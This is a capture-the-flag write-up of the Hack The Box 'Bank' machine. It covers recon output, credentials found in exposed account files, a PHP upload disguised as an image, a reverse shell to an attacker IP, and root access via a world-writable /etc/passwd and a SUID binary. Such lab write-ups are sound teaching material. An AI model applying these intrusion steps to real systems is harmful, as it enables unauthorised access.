HTB: Bank Write-Up

Recons

nmap

Let's sniff the target machine to check if there is any opening to break in.

# Nmap 7.94 scan initiated Sun Nov 12 02:18:04 2023 as: nmap -vvv -Pn -sCV --open -T4 -p0-65535 -oN bank.nmap 10.10.10.29
Nmap scan report for 10.10.10.29
Host is up, received user-set (0.33s latency).
Scanned at 2023-11-12 02:18:04 EST for 84s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAMJ+YATka9wvs0FTz8iNWs6uCiLqSFhmBYoYAorFpozVGkCkU1aEJ7biybFTw/qzS9pbSsaYA+3LyUyvh3BSPGEt1BgGW/H29MuXjkznwVz60JqL4GqaJzYSL3smYYdr3KdJQI/QSvf34WU3pife6LRmJaVk+ETh3wPclyecNtedAAAAFQC1Zb2O2LzvAWf20FdsK8HRPlrx1wAAAIBIBAhLmVd3Tz+o+6Oz39g4Um1le8d3DETINWk3myRvPw8hcnRwAFe1+14h3RX4fr+LKXoR/tYrI138PJyiyl+YtQWhZnJ7j8lqnKRU2YibtnUc44kP9FhUqeAcBNjj4qwG9GyQSWm/Q5CbOokgaa6WfdcnwsUMim0h2Ad8YdU1kAAAAIBy3dOOD8jKHeBdE/oXGG0X9tKSFZv1gPr/kZ7NfqUF0kHU3oZTNK8/2qR0SNHgrZ2cLgKTIuneGS8lauXjC66NNMoUkJcMHpwRkYC0A86LDmhES6OuPsQwAjr1AtUZn97QjYu1d6WPfhTdsRYBuCotgKh2SBkzV1Bcz77Tnp56JA==
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc0rofjHtpSlqkDjjnkEiYcbUrMH0Q4a6PcxqsR3updDGBWu/RK7AGWRSjPn13uil/nl44XF/fkULy7FoXXskByLCHP8FS2gYJApQMvI9n81ERojEA0NIi6VZKP19bl1VFTk7Q5rEPIpab2xqYMBayb1ch7iP95n3iayvHEt/7cSTsddGWKeALi+rrujpnryNViiOIWpqDv+RWtbc2Wuc/FTeGSOt1LBTbtKcLwEehBG+Ym8o8iKTd+zfVudu7v1g3W2Aa3zLuTcePRKLUK3Q2D7k+5aJnWrekpiARQm3NmMkv1NuDLeW3amVBCv6DRJPBqEgSeGMGsnqkR8CKHO9/
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH30xnPq1XEub/UFQ2KoHXh9LFKMNMkt60xYF3OrEp1Y5XQd0QyeLXwm6tIqWtb0rWda/ivDgmiB4GzCIMf/HQ=
|   256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA8MYjFyo+4OwYGTzeuyNd998y6cOx56mIuciim1cvKh
53/tcp open  domain  syn-ack ttl 63 ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 12 02:19:28 2023 -- 1 IP address (1 host up) scanned in 83.86 seconds

The provided Nmap scan result reveals information about a target host with the IP address 10.10.10.29. Here's a breakdown of the findings:

1. SSH Service (Port 22):

   • State: Open

   • Service: SSH (Secure Shell)

   • Version: OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8

   • Encryption Key Types:

     • DSA (Digital Signature Algorithm)

     • RSA (Rivest-Shamir-Adleman)

     • ECDSA (Elliptic Curve Digital Signature Algorithm)

     • ED25519 (Edwards-curve Digital Signature Algorithm)

   • Operating System: Ubuntu Linux

   This indicates that the SSH service is available on the host, allowing secure remote access. The version information can be useful for identifying potential vulnerabilities or compatibility issues.

2. Domain Service (Port 53):

   • State: Open

   • Service: Domain (DNS - Domain Name System)

   • Version: ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)

   The Domain service being open suggests that this host is likely responsible for DNS resolution within the network. The version information can help in assessing potential vulnerabilities or compatibility with other DNS systems.

3. HTTP Service (Port 80):

   • State: Open

   • Service: HTTP (Hypertext Transfer Protocol)

   • Version: Apache httpd 2.4.7 (Ubuntu)

   • Server Header: Apache/2.4.7 (Ubuntu)

   • HTTP Methods Supported: POST, OPTIONS, GET, HEAD

   • HTTP Title: Apache2 Ubuntu Default Page: It works

   The HTTP service being open indicates that the host is running a web server, serving content over the HTTP protocol. The version information can be valuable for understanding potential vulnerabilities or compatibility issues with web applications running on this server.

4. Additional Information:

   • Latency: The host responded with a latency of 0.33 seconds, indicating a relatively quick response time.

   • Operating System: Detected as Linux, with the Common Platform Enumeration (CPE) specifying the Linux kernel.

This Nmap scan provides valuable insights into the services running on the target host, allowing for further analysis and potential identification of security risks or areas of interest for further investigation.

DNS

dig

With a standard DNS tool called 'dig' available in Linux, we can pull it off the following DNS recon on the target machine.

The series of commands demonstrate the process of retrieving domain zone details using the dig command from a DNS server, filtering the output with grep, sort, and awk, and finally copying the manipulated output to the clipboard using xclip. Here's an explanation of each step:

1. Original dig Command:

   • The initial command requests a zone transfer (axfr) for the domain bank.htb from the DNS server located at 10.10.10.29.

2. Filtered Output with grep:

   • grep -E '(\w+\.)?\w+\.htb': Filters the output to include only lines containing domain names with the .htb extension.

3. Print Matches Only with grep -o:

   • grep -oE '(\w+\.)?\w+\.htb': Prints only the matched domain names, one per line.

4. Sort and Print Unique Entries with sort -u:

   • sort -u: Sorts the domain names alphabetically and prints only unique entries.

5. Translate Newlines to Spaces with tr:

   • tr '\n' ' ': Translates newline characters to spaces, combining all domain names into a single line.

6. Manipulate Output with awk:

   • awk '{print "10.10.10.29\t" $1 " " $2 " " $3 " " $4}': Formats the output to include the DNS server IP address (10.10.10.29) followed by the domain names.

7. Copy Output to Clipboard with xclip:

   • xclip -selection clipboard: Copies the manipulated output to the clipboard for easy pasting into other applications.

Overall, this series of commands provides a streamlined way to retrieve domain zone details from a DNS server, filter and manipulate the output, and then copy it to the clipboard for further use. This can be particularly useful for network administrators or security professionals conducting DNS-related investigations or audits.

To make my life a bit easier and work with DNS, I add the following entry to my local Kali machine's /etc/hosts file.

Web

WhatWeb

Since the Nmap scan result shows that the TCP port 80 HTTP is opening, I would like to confirm its operating system and version.

It is a command-line tool called WhatWeb, which is used for web fingerprinting or identifying the technologies used by a website. Here's an analysis of the output:

1. URL: http://10.10.10.29

   • This is the URL of the target website being analyzed.

2. Response Status: [200 OK]

   • Indicates that the web server responded with a successful HTTP status code, meaning the request was processed without errors.

3. Web Server: Apache [2.4.7]

   • Specifies the web server software being used, which in this case is Apache version 2.4.7. Apache is a widely used open-source web server software.

4. Country: RESERVED [ZZ]

   • The country field typically provides information about the geographical location of the server based on its IP address. However, in this case, it shows "RESERVED" with the country code "ZZ", which suggests that the country information is not available or reserved.

5. HTTP Server: Ubuntu Linux [Apache/2.4.7 (Ubuntu)]

   • Indicates the underlying operating system and its version, which is Ubuntu Linux. Additionally, it mentions that Apache version 2.4.7 is specifically configured for Ubuntu.

6. IP Address: 10.10.10.29

   • Specifies the IP address of the target server.

7. Title: Apache2 Ubuntu Default Page: It works

   • Provides the title of the webpage, which is the default page served by Apache on an Ubuntu system. This is often displayed when no specific content is configured for the root URL of the web server.

WhatWeb analysis reveals that the target website is hosted on a server running Apache version 2.4.7 on Ubuntu Linux. The default page for Apache on Ubuntu is being served, indicating that the web server is operational and accessible.

Aquatone

It illustrates the process of using Aquatone, a reconnaissance tool, to capture screenshots and generate reports for a list of domain URLs. Here's a breakdown of each step:

1. Download Aquatone:

   • Fetches the Aquatone release from GitHub using wget.

2. Unzip Aquatone:

   • Extracts the downloaded Aquatone zip file using unzip.

3. Retrieve Domain URLs with dig:

   • Performs a zone transfer for the domain bank.htb from the DNS server at 10.10.10.29, filters and sorts unique domain names, and saves them to a file named bank.urls.

4. Prepend http:// to URLs with sed:

   • Adds http:// prefix to each line in bank.urls.

5. Feed URLs to Aquatone:

   • Pipes the contents of bank.urls to Aquatone for scanning.

6. Open Aquatone HTML Report:

   • Opens the generated HTML report in a web browser (Firefox) for review.

These commands demonstrate a streamlined process for using Aquatone to perform reconnaissance on a list of domain URLs, capturing screenshots and generating reports for further analysis.

Gobuster

The output displays the results of a web scan conducted with Gobuster, a popular directory and file brute-forcing tool. Here's an explanation of the scan:

1. Tool Information:

   • Gobuster version 3.6 is being used for the scan. Gobuster is a tool used to brute-force: URIs (directories and files) in web sites, DNS subdomains (with wildcard support), Virtual Host names on target web servers, Open Amazon S3 buckets, Open Google Cloud buckets and TFTP servers. Gobuster is useful for pentesters, ethical hackers and forensics experts. It also can be used for security tests.

2. Scan Configuration:

   • URL: http://bank.htb

   • Method: GET

   • Threads: 100

   • Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

   • Negative Status codes: 404 (ignore 404 Not Found responses)

   • User Agent: gobuster/3.6

   • Timeout: 10 seconds

3. Results:

   • The scan is performed in directory enumeration mode.

   • Directories or paths found during the scan:

     • /uploads: Redirects to http://bank.htb/uploads/

     • /assets: Redirects to http://bank.htb/assets/

     • /inc: Redirects to http://bank.htb/inc/

     • /server-status: Access forbidden (Status: 403 Forbidden)

     • /balance-transfer: Redirects to http://bank.htb/balance-transfer/

Gobuster successfully identified several directories and paths on the target website http://bank.htb, along with their corresponding status codes and sizes. This information can be valuable for further reconnaissance and vulnerability assessment, allowing security professionals to explore potentially sensitive areas of the web application. Additionally, the presence of directories like "uploads," "assets," and "balance-transfer" may provide avenues for further investigation or exploitation.

Nuclei

The command executes a scan using Nuclei against the target URLs listed in bank.urls. Here's a breakdown of the process and the findings:

1. Nuclei Installation and Version Check:

   • Nuclei-templates are installed, and the current version of Nuclei (v3.0.2) and the loaded templates (v9.6.9) are displayed.

2. Template Execution:

   • Nuclei executes a total of 7278 templates for the scan, comprising both signed and unsigned templates.

   • The templates are clustered to reduce the number of requests, resulting in 1252 clusters and 4876 reduced requests.

3. Targets Loaded and Interactsh Server:

   • Four targets are loaded for the current scan, which correspond to the URLs listed in bank.urls.

   • Nuclei utilizes an Interactsh Server at oast.live during the scan.

4. Detection of HTTP Methods and Web Servers:

   • Nuclei identifies various HTTP methods supported by the target URLs, such as POST, OPTIONS, GET, and HEAD.

   • Detection of web servers reveals that the targets are running Apache/2.4.7 on Ubuntu.

5. Identification of Vulnerabilities and Misconfigurations:

   • Nuclei detects several vulnerabilities and misconfigurations across the target URLs, including:

     • Missing security headers like X-Frame-Options, Content-Security-Policy, and Strict-Transport-Security.

     • Exposure of sensitive files like WEB-INF/web.xml, potentially indicating information disclosure vulnerabilities (e.g., CVE-2021-28164).

     • Detection of weak SSH configurations, including password authentication and supported authentication methods.

6. Additional Observations:

   • Nuclei skips some target URLs (www.bank.htb, ns.bank.htb, chris.bank.htb, bank.htb) due to unresponsiveness after multiple attempts.

The scan provides valuable insights into potential security issues and vulnerabilities present in the target URLs. These findings can aid in securing the web applications and network infrastructure against various threats and attacks. Nuclei proves to be a versatile and effective tool for security scanning, offering comprehensive coverage of web and network security assessment.

Analysis

It's a series of actions against the target URL http://bank.htb/balance-transfer. Let's break down each step:

1. Counting Files Ending with .acc:

   • It uses curl to fetch the HTML content from the specified URL.

   • grep is used to filter lines containing .acc case-insensitively.

   • wc -l counts the number of lines, which corresponds to the number of files ending with .acc.

   • Result: 999 files ending with .acc.

2. Counting Files Not Ending with .acc:

   • Similar to the previous step, but this time grep -iv is used to exclude lines containing .acc.

   • Result: 15 files not ending with .acc.

3. Listing Files and Their Sizes:

   • The script fetches the content, extracts file names and sizes, and sorts them by size.

   • It uses a combination of grep, cut, tr, sort, and head.

   • The output lists the first 10 files sorted by size, showing their names and sizes.

4. Statistics on Byte Sizes:

   • It retrieves file sizes, counts their occurrences, and sorts them.

   • grep, cut, tr, sort, and uniq -c are used.

   • The output displays the count of files for each unique byte size.

5. Retrieving a Specific File:

   • It fetches the content, identifies files with a size of 257 bytes, and displays their names.

   • The output reveals a single file with the specified size.

6. Viewing the Content of the File:

   • The script fetches the content of the file 68576f20e9732f1b2edc4df5b8533230.acc.

   • The content includes sensitive information like full name, email, password, credit card count, transactions count, and balance.

7. Recording the Credentials:

   • It records the credentials ([email protected]: !##HTBB4nkP4ssw0rd!##) in a file named creds.txt.

8. Logging in to the Account:

   • It suggests logging in to the account using the obtained credentials.

   • After successful login, it advises looking for the place to upload files, as there is a directory for uploads.

9. Crafting a Request for File Upload:

   • It provides instructions for crafting a request to upload a file with PHP code execution inside a PNG file.

10. Source Code Inspection:

    • It suggests inspecting the source code of bank.htb/support.php and mentions a debug block added for executing .htb files as PHP for debugging purposes.

It demonstrates a systematic approach to exploring and interacting with a web application, including enumeration of files, extraction of sensitive information, and identification of potential vulnerabilities for further exploitation.

pwncat

This sequence of commands and actions depicts steps taken during a penetration testing exercise against a target system (bank.htb). Let's review each step:

1. Reverse Shell Command:

   • The curl command is used to send a payload to a potentially vulnerable endpoint (http://bank.htb/uploads/implant.png.htb). The payload is designed to execute a reverse shell back to the attacker's machine by using the bash -c command and redirecting input and output to a specified IP address and port (10.10.16.3:443).

2. Installation of Pwncat:

   • The pwncat tool is installed using the system package manager (apt). pwncat is a utility for handling reverse shell connections and is commonly used in penetration testing scenarios.

3. Listening for Reverse Shell:

   • pwncat is configured to listen on port 443 for an incoming reverse shell connection. Upon successful connection, the shell is obtained as the www-data user.

4. Finding SUID Binaries:

   • The find command is utilised to search for files with the SUID (Set User ID) bit set across the filesystem. The output reveals several binaries with the SUID bit set, including /var/htb/bin/emergency, which could potentially be used for privilege escalation.

5. Checking Permissions on /etc/passwd:

   • The permissions of the /etc/passwd file are inspected, indicating that it is writable by all users (rw-rw-rw-). This misconfiguration could allow unauthorised modification of user account information.

6. Inspecting SSHD Configuration:

   • The sshd_config file is examined to check the configuration related to SSH login. The output shows that PermitRootLogin is set to yes, which allows root login via SSH. This configuration could pose a security risk if not properly managed.

It's a systematic approach to identifying vulnerabilities and potential attack vectors during a penetration testing engagement. Further steps may involve exploiting discovered vulnerabilities to escalate privileges and gain deeper access to the target system.

Exploits

Writable /etc/passwd

This sequence of commands demonstrates a method for achieving privilege escalation by adding a new user to the /etc/passwd file and then accessing the system as the newly created user. Let's break down the steps:

1. Obtaining Password Hash:

   • The openssl passwd -1 command is used to generate a password hash for the password "P@ssword1!". The resulting hash is $1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0.

2. Appending User to /etc/passwd:

   • The echo command is utilised to append a new user entry to the /etc/passwd file. The entry includes the username "tyla", the password hash obtained earlier, and other necessary fields such as user ID (0 for root), group ID (0 for root), user information, home directory, and shell.

3. Verifying Entry in /etc/passwd:

   • The contents of the /etc/passwd file are displayed using the cat command to confirm that the new user entry has been successfully added.

4. SSH Login as New User:

   • SSH login is attempted using the newly created user "tyla" with the password "P@ssword1!". Upon successful authentication, access to the system is granted, and the user is logged in as root.

This series of actions highlights a critical misconfiguration in the system where the /etc/passwd file is writable by non-privileged users. By exploiting this misconfiguration, an attacker can effectively add a new user with root privileges, thereby gaining unauthorised access to the system. It underscores the importance of proper file permission management and regular security audits to mitigate such risks.

SUID

The commands demonstrate the analysis and execution of a binary file named "emergency," leading to privilege escalation to root. Here's a breakdown:

1. Checking File Type:

   • The file command is used to determine the type of the binary file located at /var/htb/bin/emergency.

   • The output indicates that it is a setuid ELF 32-bit LSB (Linux Standard Base) shared object file, designed for the Intel 80386 architecture, and dynamically linked.

2. Executing the Binary:

   • The binary file /var/htb/bin/emergency is executed directly.

   • After execution, the user's identity is checked using the id and whoami commands.

   • The output shows that the user's effective user ID (euid) has been escalated to 0 (root), granting full root privileges.

   • Both id and whoami commands confirm that the current user is now "root."

The successful execution of the "emergency" binary results in a privilege escalation, allowing the user "www-data" to gain root access. This indicates a critical security vulnerability, possibly due to misconfigured permissions or a flaw in the binary itself, which can be exploited by attackers to gain unauthorised access and control over the system.